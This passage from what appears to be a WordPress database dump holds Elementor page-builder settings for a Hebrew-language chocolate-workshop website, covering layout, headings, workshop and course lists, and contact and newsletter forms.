id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(319,81,'_elementor_version','0.4'),(320,81,'_elementor_template_type','post'),(321,82,'_wp_page_template','elementor_canvas'),(322,82,'_elementor_edit_mode','builder'),(323,82,'_elementor_data','[{\"id\":\"700950a2\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"20a86e96\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"62b3fe8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2f67ac3a\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"1abed8db\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"5569e669\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4058fdb2\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"778b3676\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"37eaf375\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61dc30dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"31a67108\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e3bf2db\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"5122f9c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"63f9b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61739365\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"377296c9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"a673372\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"40017cec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"23388368\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New 